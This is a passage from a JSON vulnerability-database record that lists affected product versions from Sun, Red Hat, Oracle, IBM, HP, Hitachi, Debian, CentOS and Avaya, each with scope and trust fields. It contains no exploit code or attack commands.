"sun", "version": "1.5" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "trio tview software", "scope": "eq", "trust": 0.3, "vendor": "schneider electric", "version": "3.27.0" }, { "model": "suse core for", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9x86" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "core", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.5" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.5" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "jrockit r28.2.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "websphere real time sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.0" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "virtualization engine ts7700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.33" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.32" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.29" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.104" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.203" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3.1" }, { "model": "tivoli monitoring fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli monitoring fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.24" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.13" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.12" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.11" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.4" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56009.7" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "os/400 v6r1m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "os/400 v5r4m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.8" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.7" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.6" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.4" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "java sdk sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr5-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "java sdk sr13-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "java sdk sr13-fp17", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "i v5r4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87341.3" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87341.1.0" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87311.3" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87311.1.0" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79551.3" }, { "model": "flex system manager types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79551.1.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "nonstop server j6.0.14.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.16", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.15.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.15", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.14.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.14", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.13.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.13", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.12.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.11.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.11.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.10.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.10.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.10.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.09.04", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.09.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.09.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.09.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.09.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.08.04", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.08.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.08.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.08.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.08.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.07.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.07.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.07.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.06.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.06.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.06.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.06.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.05.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.05.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.05.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.04.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.04.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.04.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.27", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.26.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.26", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.25.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.25", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.24.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.24", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.22.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.22.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.21.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.21.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.21.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.20.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.20.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.20.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.20.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.19.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.19.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.19.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.19.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.18.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.18.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.18.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.17.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.17.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.17.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.17.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.16.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.16.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.16.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.15.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.15.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.15.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "4.0" }, { "model": "cosminexus server web edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-4" }, { "model": "cosminexus server standard edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-4" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "9.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "voice portal sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "meeting exchange", "scope": 